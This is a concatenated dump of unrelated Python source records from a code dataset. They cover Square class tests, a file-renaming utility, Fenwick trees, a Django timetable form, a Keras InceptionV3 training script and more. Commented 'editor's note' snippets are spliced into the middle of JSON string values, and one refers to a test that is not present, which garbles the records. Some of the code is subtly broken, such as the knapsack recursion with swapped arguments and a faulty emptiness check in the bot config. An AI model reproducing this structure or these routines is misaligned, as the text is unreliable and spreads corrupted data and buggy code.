8281)\n\n def test_sq_noargs(self):\n try:\n self.a0 = Square()\n\n except:\n self.assertRaises(TypeError, \"__init__() missing 1 required positional argument: 'size'\")\n\n def test_sq_wrong_size(self):\n with 
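# Editor's note: a worked instance of the normal form round-tripped by the
# test above. For the horizontal line y = 5 (the y1 == y2 branch of
# _pts_to_norm), rho is the distance of the line from the origin and theta is
# the angle of its normal, so (rho, theta) = (5, pi/2).
import math

x1, y1, x2, y2 = 0, 5, 10, 5
rho, theta = (y1 + y2) / 2, math.pi / 2
assert abs(rho - 5) < 1e-9 and abs(theta - math.pi / 2) < 1e-9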
self.assertRaisesRegex(TypeError, \"width must be an integer\"):\n r1 = Square(\"9\")\n\n with self.assertRaisesRegex(TypeError, \"x must be an integer\"):\n r2 = Square(1, \"8\")\n\n with self.assertRaisesRegex(TypeError, \"y must be an integer\"):\n r3 = Square(1, 8, \"9\")\n\n with self.assertRaisesRegex(ValueError, \"width must be > 0\"):\n r4 = Square(-9)\n\n with self.assertRaisesRegex(ValueError, \"width must be > 0\"):\n r5 = Square(0)\n\n def test_sq_wrong_size2(self):\n try:\n self.a0 = Rectangle(1, 2)\n self.a1 = Square(None)\n\n except:\n self.assertRaises(TypeError, \"width must be an integer\")\n\n def test_sq_wrong_size3(self):\n try:\n self.a0 = Rectangle(1, 2)\n self.a1 = Square([])\n\n except:\n self.assertRaises(TypeError, \"width must be an integer\")\n\n def test_sq_bad_size5(self):\n try:\n self.a0 = Square((1, 9))\n\n except:\n self.assertRaises(TypeError, \"width must be an integer\")\n\n def test_sq_bad_x(self):\n with self.assertRaisesRegex(ValueError, \"x must be >= 0\"):\n self.a0 = Square(1, -9, 1)\n\n def test_sq_bad_y(self):\n with self.assertRaisesRegex(ValueError, \"y must be >= 0\"):\n self.a0 = Square(1, 2, -9)\n\n def test_sq_str(self):\n self.a7 = Square(2, 2)\n with patch('sys.stdout', new=StringIO()) as f:\n print(self.a7)\n self.assertEqual(f.getvalue(),'[Square] (1) 2/0 - 2\\n')\n\n def test_sq_dict(self):\n self.a0 = Square(2, 2)\n r1_dictionary = self.a0.to_dictionary()\n self.assertIs(type(r1_dictionary), dict)\n\n def test_sq_update1(self):\n self.a0 = Square(2, 2)\n self.a0.update()\n with patch('sys.stdout', new=StringIO()) as f:\n print(self.a0)\n self.assertEqual(f.getvalue(),'[Square] (1) 2/0 - 2\\n')\n\n def test_sq_update2(self):\n self.a0 = Square(2, 2)\n self.a0.update(89)\n with patch('sys.stdout', new=StringIO()) as f:\n print(self.a0)\n self.assertEqual(f.getvalue(),'[Square] (89) 2/0 - 2\\n')\n\n def test_sq_update3(self):\n self.a0 = Square(2, 2)\n self.a0.update(89, 1)\n with patch('sys.stdout', new=StringIO()) as f:\n print(self.a0)\n self.assertEqual(f.getvalue(), '[Square] (89) 2/0 - 1\\n')\n\n def test_sq_update4(self):\n self.a0 = Square(2, 2)\n self.a0.update(89, 1, 2)\n with patch('sys.stdout', new=StringIO()) as f:\n print(self.a0)\n self.assertEqual(f.getvalue(),'[Square] (89) 2/0 - 1\\n')\n\n def test_sq_update5(self):\n self.a0 = Square(2, 2)\n self.a0.update(89, 1, 2, 3)\n with patch('sys.stdout', new=StringIO()) as f:\n print(self.a0)\n self.assertEqual(f.getvalue(),'[Square] (89) 2/3 - 1\\n')\n\n def test_sq_update7(self):\n self.a0 = Square(2, 2)\n self.a0.update(**{'id': 89})\n with patch('sys.stdout', new=StringIO()) as f:\n print(self.a0)\n self.assertEqual(f.getvalue(),'[Square] (89) 2/0 - 2\\n')\n\n def test_sq_update8(self):\n self.a0 = Square(2, 2)\n self.a0.update(**{ 'id': 89, 'size': 1 })\n with patch('sys.stdout', new=StringIO()) as f:\n print(self.a0)\n self.assertEqual(f.getvalue(),'[Square] (89) 2/0 - 1\\n')\n\n def test_sq_update9(self):\n self.a0 = Square(2, 2)\n self.a0.update(**{ 'id': 89, 'size': 1, 'x': 3 })\n with patch('sys.stdout', new=StringIO()) as f:\n print(self.a0)\n self.assertEqual(f.getvalue(),'[Square] (89) 3/0 - 1\\n')\n\n def test_sq_update10(self):\n self.a0 = Square(2, 2)\n self.a0.update(**{ 'id': 89, 'size': 1, 'x': 3, 'y': 8})\n with patch('sys.stdout', new=StringIO()) as f:\n print(self.a0)\n self.assertEqual(f.getvalue(),'[Square] (89) 3/8 - 1\\n')\n\n def test_sq_create1(self):\n self.a0 = Square(1, 0, 0, 89)\n self.a1 = Square.create(**{ 'id': 89 })\n with 
patch('sys.stdout', new=StringIO()) as f:\n print(self.a0)\n print(self.a1)\n print(self.a0 is self.a1)\n print(self.a0 == self.a1)\n self.assertEqual(f.getvalue(),\"[Square] (89) 0/0 - 1\\n[Square] (89) 0/0 - 1\\nFalse\\nFalse\\n\")\n\n def test_sq_create2(self):\n self.a0 = Square(1, 0, 0, 89)\n self.a1 = Square.create(**{ 'id': 89, 'size': 1})\n with patch('sys.stdout', new=StringIO()) as f:\n print(self.a0)\n print(self.a1)\n print(self.a0 is self.a1)\n print(self.a0 == self.a1)\n self.assertEqual(f.getvalue(),\"[Square] (89) 0/0 - 1\\n[Square] (89) 0/0 - 1\\nFalse\\nFalse\\n\")\n\n def test_sq_create3(self):\n self.a0 = Square(1, 2, 3, 89)\n self.a1 = Square.create(**{ 'id': 89, 'size': 1, 'x': 2, 'y': 3})\n with patch('sys.stdout', new=StringIO()) as f:\n print(self.a0)\n print(self.a1)\n print(self.a0 is self.a1)\n print(self.a0 == self.a1)\n self.assertEqual(f.getvalue(),\"[Square] (89) 2/3 - 1\\n[Square] (89) 2/3 - 1\\nFalse\\nFalse\\n\")\n\n def test_sq_save1(self):\n Square.save_to_file(None)\n with patch('sys.stdout', new=StringIO()) as f:\n with open(\"Square.json\", \"r\") as file:\n print(file.read())\n self.assertEqual(f.getvalue(),\"[]\\n\")\n\n def test_sq_save2(self):\n Square.save_to_file([])\n with patch('sys.stdout', new=StringIO()) as f:\n with open(\"Square.json\", \"r\") as file:\n print(file.read())\n self.assertEqual(f.getvalue(),\"[]\\n\")\n\n def test_sq_save3(self):\n r0 = Square(90, 2, 3, 7)\n\n Square.save_to_file([Square(90, 2, 3, 7)])\n f_dictionary_list = Square.load_from_file()\n f_dictionary2 = f_dictionary_list[0]\n\n output1 = StringIO()\n print(r0, file=output1, end='')\n contents1 = output1.getvalue()\n output1.close()\n\n output2 = StringIO()\n print(f_dictionary2, file=output2, end='')\n contents2 = output2.getvalue()\n output2.close()\n\n self.assertEqual(contents1, contents2)\n\n def test_sq_no_load(self):\n f_dictionary_list_b = Square.load_from_file()\n output = StringIO()\n print(f_dictionary_list_b, file=output, end='')\n contents = output.getvalue()\n output.close()\n self.assertEqual(contents, \"[]\")\n","sub_path":"0x0C-python-almost_a_circle/tests/test_models/test_square.py","file_name":"test_square.py","file_ext":"py","file_size_in_byte":7919,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"195095392","text":"import glob\nimport os.path\nimport string\nimport math\n\n# ファイル数から名前を生成する\nclass SequenceName:\n def __init__(self, path_dir_target, extension, radix=36, is_alignment=True):\n self.__path_dir_target = path_dir_target\n self.__extension = extension\n self.__radix = radix\n self.__is_alignment = is_alignment\n self.__files = []\n if not os.path.isdir(self.__path_dir_target): raise Exception('存在するディレクトリのパスを指定して下さい。: {}'.format(self.__path_dir_target))\n \n @property\n def Characters(self):\n if 1 < self.__radix <= 10: return string.digits[:self.__radix]\n elif self.__radix < 26: return string.digits + string.ascii_lowercase[:self.__radix - len(string.digits)]\n elif self.__radix == 26: return string.ascii_lowercase\n elif self.__radix <= 36: return string.digits + string.ascii_lowercase[:self.__radix - len(string.digits)]\n elif self.__radix == 64: return string.digits + string.ascii_lowercase + string.ascii_uppercase + '_-'\n elif self.__radix == 85: return string.digits + string.ascii_lowercase + string.ascii_uppercase + \"!#$%&'()-=~^@`[]{};+,._\"\n raise Exception('radixが未対応値です。2〜36, 64, 85のいずれかの整数値にしてください。2〜36, 64, 85のいずれかの整数値にしてください。')\n\n def Generate(self):\n 
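# Editor's note: the test_square.py record above captures print() output by
# patching sys.stdout with a StringIO; an equivalent stdlib-only sketch uses
# contextlib.redirect_stdout (illustrative, not part of the original tests).
import contextlib
from io import StringIO

buf = StringIO()
with contextlib.redirect_stdout(buf):
    print("[Square] (1) 2/0 - 1")
assert buf.getvalue() == "[Square] (1) 2/0 - 1\n"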
self.__GetFileNames()\n count = len(self.__files)\n name = self.__GetCountName(count)\n self.__Alignment(count)\n return name\n\n def __GetFileNames(self):\n reg = '*'\n if self.__extension is not None:\n if self.__extension.startswith('.'): reg += self.__extension\n else: reg += '.{}'.format(self.__extension)\n self.__files.clear()\n for path in glob.glob(os.path.join(self.__path_dir_target, reg)):\n if self.__extension is None:\n if os.path.isdir(path): self.__files.append(os.path.basename(path))\n else:\n if os.path.isfile(path): self.__files.append(os.path.splitext(os.path.basename(path))[0])\n sorted(self.__files)\n\n def __GetCountName(self, count:int):\n chars = self.Characters\n if count < len(chars): return (chars)[count]\n else: return self.__GetCountName(count // len(chars)) + (chars)[count % len(chars)]\n\n # 10.pyの名前が出力された直後、0.pyを00.pyとしたい\n def __Alignment(self, count):\n if self.__is_alignment and (count == len(self.__files)):\n import os\n prefix = self.Characters[0]\n for name in self.__files:\n fig = math.floor(math.log(count, self.__radix)) + 1\n if self.__extension: ext = '.' + self.__extension\n else: ext = ''\n os.rename(\n os.path.join(self.__path_dir_target, name+ext), \n os.path.join(self.__path_dir_target, prefix*(fig - len(name)) + name+ext))\n","sub_path":"src/script/py/os/file/SequenceName.py","file_name":"SequenceName.py","file_ext":"py","file_size_in_byte":3031,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"280292132","text":"import json\n\nfrom application import db\n\n\ndef make_json(self):\n return {\n 'id': self.id,\n 'login': self.login,\n 'address': self.address\n }\n\n\nclass Center(db.Model):\n __tablename__ = \"center\"\n id = db.Column(db.Integer, primary_key=True)\n login = db.Column(db.String(32), nullable=False)\n password = db.Column(db.String(32), nullable=False)\n address = db.Column(db.String(32))\n\n animals = db.relationship(\n \"Animal\",\n backref=\"center\",\n cascade=\"all, delete, save-update, delete-orphan\",\n single_parent=True,\n )\n\n def __repr__(self):\n center_object = {\n 'login': self.login,\n 'address': self.address\n }\n return json.dumps(center_object)\n","sub_path":"application/models/center.py","file_name":"center.py","file_ext":"py","file_size_in_byte":758,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"601265413","text":"\n\nclass KnapSackEntry:\n weight=0\n profit=0\n\n def __init__(self,weight,price):\n self.weight=weight\n self.profit=price\n\n def __repr__(self):\n return \"[\" + str(self.weight) +\", \" + str(self.profit) + \"]\"\n\n\ndef __create_set(weights, profits):\n\n entry_list=list()\n\n for i in range(len(weights)):\n knapsack_entry = KnapSackEntry(weights[i], profits[i])\n entry_list.append(knapsack_entry)\n\n return entry_list\n\n\ndef find_entries(weights, profites, bag_capacity):\n entry_list=__create_set(weights ,profites)\n return __find_entries(entry_list,list(),bag_capacity, 0 ,0)\n\n\ndef __find_entries(entry_list , current_list , bag_capacity ,current_weight , current_profit):\n\n print(current_list)\n\n if len(entry_list) == 1:\n return entry_list[0].profit\n\n if current_weight > bag_capacity :\n return 0\n\n\n max_profit = current_profit\n\n print(current_weight,max_profit)\n\n for i in range(len(entry_list)):\n current_list.append(entry_list[i])\n new_current_weight = current_weight + entry_list[i].weight\n new_current_profit = current_profit + entry_list[i].profit\n\n 
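# Editor's note: a standalone sketch of the base-N counting behind
# __GetCountName in the SequenceName record above (radix 36: digits, then
# lowercase letters). The helper mirrors the class method for illustration.
import string

CHARS = string.digits + string.ascii_lowercase  # radix 36

def count_name(count):
    if count < len(CHARS):
        return CHARS[count]
    return count_name(count // len(CHARS)) + CHARS[count % len(CHARS)]

assert count_name(0) == '0'
assert count_name(35) == 'z'
assert count_name(36) == '10'  # rolls over like an odometer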
with_item_max_profit = __find_entries(entry_list, current_list, bag_capacity, new_current_weight,new_current_profit)\n if with_item_max_profit == 0:\n with_item_max_profit = current_profit\n\n max_profit = max(current_profit, with_item_max_profit)\n\n return max_profit\n\n\nprices = list([2,3,4,5])\nweights = list([1,2,5,6])\n\nmax_profit = find_entries(prices,weights,5)\n\nprint(str(max_profit))\n\n","sub_path":"salpe/dynamic_programming/0_1_knapsack.py","file_name":"0_1_knapsack.py","file_ext":"py","file_size_in_byte":1581,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"373748958","text":"from bot.dataIO import fileIO\r\nimport os\r\n\r\ntry:\r\n data_json = {\r\n \"Discord\": {\r\n \"webhook_url\": os.environ[\"WEBHOOK_URL\"]\r\n },\r\n \"Weibo\": {\r\n \"weibo_id\": os.environ[\"WEIBO_ID\"].replace(\" \", \"\").split(\",\")\r\n }\r\n }\r\nexcept:\r\n if fileIO(\"bot/data.json\", \"check\"):\r\n data_json = fileIO(\"bot/data.json\", \"load\")\r\n\r\nif data_json[\"Weibo\"][\"weibo_id\"] is \"\" or None:\r\n raise ValueError(\"weibo id not found\")\r\n","sub_path":"bot/global_values.py","file_name":"global_values.py","file_ext":"py","file_size_in_byte":471,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"117018290","text":"import tkinter as tk\nimport os\nimport webbrowser\n\n\n\nroot = tk.Tk()\nroot.title(\"Automate 3 functions\")\n\ndef github():\n webbrowser.open_new_tab(\"github.com\")\n\nbutton1 = tk.Button(root,text=\"open github\",width= 25,command = github)\nbutton1.pack()\n\ndef code():\n os.system(\"code\")\n\nbutton2 = tk.Button(root,text=\"Start vs code\", width = 25, command= code)\nbutton2.pack()\n\ndef checkmail():\n webbrowser.open_new_tab(\"gmail.com/inbox\")\n\nbutton3 = tk.Button(root,text=\"Check your email\",width= 25,command =checkmail )\nbutton3.pack()\n\n\n\nroot.mainloop()\n","sub_path":"automate-gci/automate-gci.py","file_name":"automate-gci.py","file_ext":"py","file_size_in_byte":553,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"54287258","text":"# simpleバージョン\nclass BinaryIndexedTree:\n def __init__(self,size):\n self.N = size\n self.bit = [0]*(size+1)\n def add(self,x,w): # 0-indexed\n x += 1\n while x <= self.N:\n self.bit[x] += w\n x += (x & -x)\n def _sum(self,x): # 1-indexed\n ret = 0\n while x > 0:\n ret += self.bit[x]\n x -= (x & -x)\n return ret\n def sum(self,l,r): # [l,r)\n return self._sum(r) - self._sum(l)\n def __str__(self): # for debug\n arr = [self.sum(i,i+1) for i in range(self.N)]\n return str(arr)\n\n\nclass BIT:\n \"\"\" 区間加算BIT(区間加算・区間合計取得) \"\"\"\n \n def __init__(self, N):\n # 添字0が使えないので、内部的には全て1-indexedとして扱う\n N += 1\n self.N = N\n self.data0 = [0] * N\n self.data1 = [0] * N\n \n def _add(self, data, k, x):\n k += 1\n while k < self.N:\n data[k] += x\n k += k & -k\n \n def _get(self, data, k):\n k += 1\n s = 0\n while k:\n s += data[k]\n k -= k & -k\n return s\n \n def add(self, l, r, x):\n \"\"\" 区間[l,r)に値xを追加 \"\"\"\n \n self._add(self.data0, l, -x*(l-1))\n self._add(self.data0, r, x*(r-1))\n self._add(self.data1, l, x)\n self._add(self.data1, r, -x)\n \n def query(self, l, r):\n \"\"\" 区間[l,r)の和を取得 \"\"\"\n \n return self._get(self.data1, r-1) * (r-1) + self._get(self.data0, r-1) \\\n - self._get(self.data1, l-1) * (l-1) - self._get(self.data0, l-1)\n\ndef ctoi(c):\n return ord(c) - ord('a')\n\ndef main():\n N = int(input())\n S = input()\n Q = int(input())\n query 
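# Editor's note: the recursive search in the 0_1_knapsack.py record above
# appears to revisit items and runs in exponential time; the textbook
# one-dimensional DP is sketched here for contrast, reusing the record's own
# weights/profits example.
def knapsack(weights, profits, capacity):
    # dp[c] = best profit achievable with total weight <= c
    dp = [0] * (capacity + 1)
    for w, p in zip(weights, profits):
        for c in range(capacity, w - 1, -1):  # reverse: each item used once
            dp[c] = max(dp[c], dp[c - w] + p)
    return dp[capacity]

# weights 1 and 2 fit in capacity 5 together, for profit 2 + 3 = 5
assert knapsack([1, 2, 5, 6], [2, 3, 4, 5], 5) == 5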
= [input().split() for i in range(Q)]\n bits = [BIT(N) for i in range(26)]\n s = []\n for i, c in enumerate(S):\n bits[ctoi(c)].add(i,i+1,1)\n s.append(c)\n\n for a, b, c in query:\n if a == '1':\n i = int(b) - 1\n bits[ctoi(s[i])].add(i,i+1,-1)\n bits[ctoi(c)].add(i,i+1,1)\n s[i] = c\n else:\n l = int(b) - 1\n r = int(c)\n a = 0\n for i in range(26):\n if bits[i].query(l,r):\n a += 1\n print(a)\n\n\n\n\nif __name__ == \"__main__\":\n main()","sub_path":"Python_codes/p02763/s449233211.py","file_name":"s449233211.py","file_ext":"py","file_size_in_byte":2335,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"244158399","text":"from greent.util import Text\nfrom greent.util import LoggingUtil\nimport logging\n\nlogger = LoggingUtil.init_logging(__name__, level=logging.DEBUG, format='long')\n\ndef synonymize(node, gt):\n synonyms = get_synonyms(node,gt)\n '''\n Canning this, because we're not relying on chemotext any more\n # do we have any MeSH ids? If not, we want to dig deeper and get some so that chemotext will work\n # As we modify our literature diving methods, we might not need this any more.\n try:\n double_check_for_mesh(node,synonyms,gt)\n except Exception as e:\n logger.error(\"Failure for getting MESH: {}\".format(node.identifier))\n logger.error(e)\n '''\n # OK, we're not going to use them all, there's some BS PMIDs that come back...\n synonyms = {s for s in synonyms if not s.identifier.startswith('PMID')}\n node.synonyms.update(synonyms)\n return synonyms\n\ndef get_synonyms(node, gt, distance=2):\n #OXO doesn't know about every kind of curie. So let's see if it knows about our node identifier\n synonyms = get_synonyms_with_curie_check(node.id, gt, distance=distance)\n if len(synonyms) == 0:\n #OXO didn't know about it. 
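# Editor's note: a quick usage sketch for the two Fenwick-tree classes defined
# in the record above (BinaryIndexedTree for point updates, BIT for range
# add / range sum); it assumes those classes as written, and indices follow
# their 0-indexed, half-open API.
bit = BinaryIndexedTree(5)
bit.add(0, 3)               # +3 at index 0
bit.add(2, 4)               # +4 at index 2
assert bit.sum(0, 3) == 7   # sum over [0, 3)

rbit = BIT(5)
rbit.add(1, 4, 2)           # +2 on every index in [1, 4)
assert rbit.query(0, 5) == 6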
So we're going to call oxo with our (valid) synonyms\n #Because of this, we're likely to end up with a mix of Strings and LabeledID\n known_synonyms = node.synonyms\n for s in known_synonyms:\n synonyms.update( get_synonyms_with_curie_check(s.identifier,gt, distance=distance) )\n return synonyms\n\ndef get_synonyms_with_curie_check( identifier,gt,distance=2):\n if gt.oxo.is_valid_curie_prefix( Text.get_curie(identifier)):\n #synonyms = gt.oxo.get_synonymous_curies(identifier, distance=distance)\n synonyms = gt.oxo.get_synonymous_curies_and_labels(identifier, distance=distance)\n else:\n synonyms = set()\n return synonyms\n\ndef double_check_for_mesh( node, new_synonyms, gt):\n all_synonyms = set()\n all_synonyms.update(node.synonyms)\n all_synonyms.update(new_synonyms)\n for s in all_synonyms:\n if Text.get_curie(s) == 'MESH':\n return\n #No Mesh Found\n meshs = set()\n for s in all_synonyms:\n meshs.update( get_particular_synonyms(s, 'MESH', gt, distance=3))\n node.add_synonyms(meshs)\n\ndef get_particular_synonyms( identifier, prefix, gt, distance ):\n newsyns = get_synonyms_with_curie_check(identifier, gt, distance=distance)\n return set( filter( lambda x: Text.get_curie(x) == prefix, newsyns))\n\n\n","sub_path":"greent/synonymizers/oxo_synonymizer.py","file_name":"oxo_synonymizer.py","file_ext":"py","file_size_in_byte":2484,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"115577116","text":"# pylint: disable=no-member, unexpected-keyword-arg, too-many-public-methods,\n# pylint: too-few-public-methods, import-error, relative-import\n\"\"\"Forms create here\"\"\"\n\nfrom django import forms\nfrom periods.models import Period\n\nMONDAY = 0\nTUESDAY = 1\nWEDNESDAY = 2\nTHURSDAY = 3\nFRIDAY = 4\nSATURDAY = 5\nSUNDAY = 6\nDAY_CHOICES = (\n (1, 'Monday'),\n (2, 'Tuesday'),\n (3, 'Wednesday'),\n (4, 'Thursday'),\n (5, 'Friday'),\n (6, 'Saturday'),\n (7, 'Sunday')\n)\n\nORDER_CHOICES = (\n (1, '1'),\n (2, '2'),\n (3, '3'),\n (4, '4'),\n (5, '5'),\n (6, '6'),\n (7, '7'),\n (8, '8'),\n (9, '9'),\n (10, '10'),\n)\nTYPE_PERIOD_CHOICES = (\n (1, 'Science'),\n (2, 'Technology'),\n (3, 'Art'),\n (4, 'Economic'),\n (5, 'Others'),\n)\n\n\nclass EditPeriodForm(forms.Form):\n \"\"\"Form to edit period\"\"\"\n code = forms.CharField(max_length=10)\n name = forms.CharField(max_length=30)\n lecturer = forms.CharField(max_length=30)\n day = forms.ChoiceField(\n widget=forms.Select,\n choices=DAY_CHOICES,\n )\n start = forms.ChoiceField(\n widget=forms.Select,\n choices=ORDER_CHOICES,\n )\n length = forms.IntegerField()\n\n period_type = forms.ChoiceField(\n widget=forms.Select,\n choices=TYPE_PERIOD_CHOICES,\n )\n\n def check_conflict(self, pid):\n \"\"\"Check if course conflicts with already-enrolled course\"\"\"\n periods_array = Period.objects.filter(timetable_id=pid)\n pos = (int(self.cleaned_data['day']) - 1) * 10\n pos += int(self.cleaned_data['start'])\n leg = self.cleaned_data['length']\n free = [1, 2, 3, 4, 5, 6, 7, 8, 9, 10, 11, 12, 13, 14, 15, 16, 17, 18,\n 19, 20, 21, 22, 23, 24, 25, 26, 27, 28, 29, 30, 31, 32, 33, 34,\n 35, 36, 37, 38, 39, 40, 41, 42, 43, 44, 45, 46, 47, 48, 49, 50,\n 51, 52, 53, 54, 55, 56, 57, 58, 59, 60, 61, 62, 63, 64, 65, 66,\n 67, 68, 69, 70, 71, 72, 73]\n for f in free:\n f = False\n for period in periods_array:\n free[period.position] = False\n j = period.position\n while j <= period.position + period.length-1:\n if (j > 0) and (j < 71):\n free[j] = False\n j += 1\n j = pos\n while j <= pos+leg-1:\n if j > 70:\n 
return False\n if not free[j]:\n return False\n else:\n free[j] = False\n j += 1\n return True\n\n","sub_path":"periods/forms.py","file_name":"forms.py","file_ext":"py","file_size_in_byte":2523,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"18004084","text":"from keras.applications.inception_v3 import InceptionV3,preprocess_input\nfrom keras.layers import Dense,Dropout ,BatchNormalization,Flatten\nfrom keras.layers import GlobalAveragePooling2D,AveragePooling2D\nfrom keras.models import Model\nfrom keras.preprocessing.image import ImageDataGenerator\nfrom keras.callbacks import EarlyStopping,ModelCheckpoint\nimport matplotlib.pyplot as plt\n\nimg_width, img_height = 299, 299\ntrain_data_dir = '/home/cihan/Desktop/DATAFOLDER/train'\nvalidation_data_dir = '/home/cihan/Desktop/DATAFOLDER/test'\n# number of epochs to train top model\nepochs = 100\n# batch size used by flow_from_directory and predict_generator\nbatch_size = 16\n\ndef train_maodel():\n # create the base pre-trained model\n base_model = InceptionV3(weights='imagenet', include_top=False)\n\n # add a global spatial average pooling layer\n x = base_model.output\n x = GlobalAveragePooling2D()(x)\n # let's add a fully-connected layer\n x = Dropout(0.5)(x)\n x = Dense(1024, activation='relu')(x) # try dense layer lower TODO :\n x = BatchNormalization()(x)\n x = Dropout(0.5)(x)\n # # and a logistic layer -- let's say we have 4 classes\n\n predictions = Dense(4, activation='softmax')(x)\n\n\n\n # this is the model we will train\n model = Model(inputs=base_model.input, outputs=predictions)\n\n # first: train only the top layers (which were randomly initialized)\n # i.e. freeze all convolutional InceptionV3 layers\n for layer in base_model.layers:\n layer.trainable = False\n\n # compile the model (should be done *after* setting layers to non-trainable)\n model.compile(optimizer='rmsprop', loss='categorical_crossentropy',\n metrics=['accuracy'])\n\n\n train_datagen = ImageDataGenerator(\n preprocessing_function=preprocess_input\n )\n test_datagen = ImageDataGenerator(\n preprocessing_function=preprocess_input\n )\n\n train_generator = train_datagen.flow_from_directory(\n train_data_dir,\n target_size=(img_height, img_width),\n batch_size=batch_size,\n class_mode='categorical')\n nb_train_samples = len(train_generator.filenames)\n validation_generator = test_datagen.flow_from_directory(\n validation_data_dir,\n target_size=(img_height, img_width),\n batch_size=batch_size,\n class_mode='categorical')\n nb_validation_samples = len(validation_generator.filenames)\n\n # let's visualize layer names and layer indices to see how many layers\n # we should freeze:\n for i, layer in enumerate(base_model.layers):\n print(i, layer.name)\n\n # train the model on the new data for a few epochs\n model.fit_generator(\n train_generator,\n samples_per_epoch=nb_train_samples,\n epochs=2,\n validation_data=validation_generator,\n validation_steps=nb_validation_samples)\n train_datagen = ImageDataGenerator(\n preprocessing_function=preprocess_input,\n rotation_range=40,\n width_shift_range=0.1,\n height_shift_range=0.1,\n shear_range=0.1,\n zoom_range=0.3,\n horizontal_flip=True,\n vertical_flip=True,\n fill_mode='nearest')\n train_generator = train_datagen.flow_from_directory(\n train_data_dir,\n target_size=(img_height, img_width),\n batch_size=batch_size,\n class_mode='categorical')\n\n # at this point, the top layers are well trained and we can start fine-tuning\n # convolutional layers from inception 
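# Editor's note: check_conflict in the forms.py record above walks a 70-slot
# boolean grid; the underlying test is plain interval overlap, sketched here
# (illustrative helper, not part of the original form class).
def overlaps(start_a, length_a, start_b, length_b):
    # Two periods clash iff each one starts before the other one ends.
    return start_a < start_b + length_b and start_b < start_a + length_a

assert overlaps(3, 2, 4, 2)        # slots 3-4 vs 4-5 share slot 4
assert not overlaps(3, 2, 5, 1)    # slots 3-4 vs slot 5 are disjoint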
V3. We will freeze the bottom N layers\n # and train the remaining top layers.\n\n # we chose to train the top 2 inception blocks, i.e. we will freeze\n # the first 249 layers and unfreeze the rest:\n for layer in model.layers[:249]:\n layer.trainable = False\n for layer in model.layers[249:]:\n layer.trainable = True\n\n # we need to recompile the model for these modifications to take effect\n # we use SGD with a low learning rate\n from keras.optimizers import SGD\n model.compile(optimizer=SGD(lr=0.0001, momentum=0.9), loss='categorical_crossentropy',\n metrics=['accuracy'])\n\n # we train our model again (this time fine-tuning the top 2 inception blocks\n # alongside the top Dense layers\n # Save the model according to the conditions\n checkpoint = ModelCheckpoint(\"/home/cihan/Desktop/inceptionv3.h5\", monitor='val_acc', verbose=1, save_best_only=True, save_weights_only=False,\n mode='auto', period=2)\n early = EarlyStopping(monitor='val_acc', min_delta=0, patience=15, verbose=1, mode='auto')\n\n # fine-tune the model\n history = model.fit_generator(\n train_generator,\n samples_per_epoch=nb_train_samples,\n epochs=epochs,\n validation_data=validation_generator,\n validation_steps=nb_validation_samples,\n callbacks=[checkpoint, early])\n\n plt.figure(1)\n\n # summarize history for accuracy\n\n plt.subplot(211)\n plt.plot(history.history['acc'])\n plt.plot(history.history['val_acc'])\n plt.title('model accuracy')\n plt.ylabel('accuracy')\n plt.xlabel('epoch')\n plt.legend(['train', 'test'], loc='upper left')\n\n # summarize history for loss\n\n plt.subplot(212)\n plt.plot(history.history['loss'])\n plt.plot(history.history['val_loss'])\n plt.title('model loss')\n plt.ylabel('loss')\n plt.xlabel('epoch')\n plt.legend(['train', 'test'], loc='upper left')\n plt.show()\n\n\nif __name__ == '__main__':\n train_maodel()","sub_path":"test_keras/inceptionv3/inceptionv3_main.py","file_name":"inceptionv3_main.py","file_ext":"py","file_size_in_byte":5473,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"71113171","text":"# Copyright (c) 2013 Mirantis Inc.\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or\n# implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n\n\nfrom oslo_config import cfg\nfrom oslo_log import log as logging\nimport six\nfrom stevedore import enabled\n\nfrom sahara import conductor as cond\nfrom sahara import exceptions as ex\nfrom sahara.i18n import _\nfrom sahara.i18n import _LI\n\nconductor = cond.API\n\nLOG = logging.getLogger(__name__)\nCONF = cfg.CONF\n\n\nclass DataSourceManager(object):\n def __init__(self):\n self.data_sources = {}\n self._load_data_sources()\n\n def _load_data_sources(self):\n config_ds = CONF.data_sources_types\n extension_manager = enabled.EnabledExtensionManager(\n check_func=lambda ext: ext.name in config_ds,\n namespace='sahara.service.edp.data_source.types',\n invoke_on_load=True\n )\n\n for ext in extension_manager.extensions:\n if ext.name in self.data_sources:\n raise ex.ConfigurationError(\n _(\"Data source with name '%s' already exists.\") 
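# Editor's note: the fit_generator calls in the Inception record above pass
# sample counts via samples_per_epoch; Keras 2 instead expects steps_per_epoch
# measured in batches, so the usual conversion is sketched below
# (nb_train_samples is an assumed example count, not a value from the record).
import math

batch_size = 16
nb_train_samples = 4000
steps_per_epoch = math.ceil(nb_train_samples / batch_size)  # 250 batches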
